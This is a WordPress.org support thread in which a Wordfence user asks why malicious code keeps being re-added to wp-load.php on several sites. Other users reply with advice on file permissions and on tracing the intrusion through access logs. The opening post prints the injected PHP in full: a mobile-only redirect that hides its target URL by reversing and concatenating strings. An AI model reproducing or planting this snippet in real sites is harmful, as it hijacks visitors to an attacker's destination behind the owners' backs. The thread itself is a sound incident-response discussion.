Title: wp-load.php injected code keeps coming back Last modified: September 27, 2018 --- # wp-load.php injected code keeps coming back * Resolved [Matt25](https://wordpress.org/support/users/matt25/) * (@matt25) * [7 years, 8 months ago](https://wordpress.org/support/topic/wp-load-php-injected-code-keeps-coming-back/) * Hi, * I have Wordfence and a couple of my sites keep getting the wp-load.php file changed, it is the same on each site and Wordfence catches it on the scan but it is often too late by the time I get results and manually click repair. Unfortunately this means I keep getting blocked from facebook etc.. * The code that keeps being added to the bottom of the file is: * ``` if(preg_match('/(mobile|ipod|iphone|up.link|mmp|smartphone|o2|pocket|kindle|treo|nokia|blackberry|pre\/0.1|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1) {@setcookie('m_', '1', time()+3600, '/'); @header(strrev('46z'.'t3'.'a9y'.'/moc'.'.lr'.'uyn'.'it'.'//:pt'.'th :noi'.'tac'.'oL')); die();} ``` * Could you tell me how this keeps happening and where I need to look to get it to stop coming back? * Thanks in Advance Matt Viewing 3 replies - 1 through 3 (of 3 total) * [Joshkremer](https://wordpress.org/support/users/joshkremer/) * (@joshkremer) * [7 years, 8 months ago](https://wordpress.org/support/topic/wp-load-php-injected-code-keeps-coming-back/#post-10729953) * Hi Matt, I’ve been dealing with this myself on several sites at once. Each time I would recover from a backup, the hack would happen again. Then I realized that my file permissions had been set to 777 which made it impossible to stop further attacks. After asking my host to fix my file permissions then using Wordfence to remove corrupted files, I haven’t been hacked since. I’m hoping that’s enough but too early to tell. Good luck. * [wfasa](https://wordpress.org/support/users/wfasa/) * (@wfasa) * [7 years, 8 months ago](https://wordpress.org/support/topic/wp-load-php-injected-code-keeps-coming-back/#post-10733306) * Hi [@matt25](https://wordpress.org/support/users/matt25/)! * Sorry to hear your site was hacked. I think the recommendation from [@joshkremer](https://wordpress.org/support/users/joshkremer/) is sensible. You can definitely verify that your file permissions are reasonable. * There are other reasons this might happen though. To get more clues about how it’s happening you can fetch the raw access logs. Take note of the last modified timestamp on the infected file before you restore it. Then compare that timestamp to the access logs. See if you can find a specific request that happened at the same time as when the file was modified. * If all else fails you may have to hire an expert to help you clean the site once and for all. Keep in mind that if you have several sites in the same hosting account, they can infect each other so then you’d have to make sure all sites were cleaned at the same time. * Best of luck for now! * [wfasa](https://wordpress.org/support/users/wfasa/) * (@wfasa) * [7 years, 8 months ago](https://wordpress.org/support/topic/wp-load-php-injected-code-keeps-coming-back/#post-10786024) * Hi [@matt25](https://wordpress.org/support/users/matt25/), Since we haven’t heard from you for a while I’m going to go ahead and resolve this thread for now. If you have any other questions or concerns at any point, feel free to start a new thread. Thank you! Viewing 3 replies - 1 through 3 (of 3 total) The topic ‘wp-load.php injected code keeps coming back’ is closed to new replies. * ![](https://ps.w.org/wordfence/assets/icon.svg?rev=2070865) * [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/) * [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq) * [Support Threads](https://wordpress.org/support/plugin/wordfence/) * [Active Topics](https://wordpress.org/support/plugin/wordfence/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/) * [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/) * 3 replies * 3 participants * Last reply from: [wfasa](https://wordpress.org/support/users/wfasa/) * Last activity: [7 years, 8 months ago](https://wordpress.org/support/topic/wp-load-php-injected-code-keeps-coming-back/#post-10786024) * Status: resolved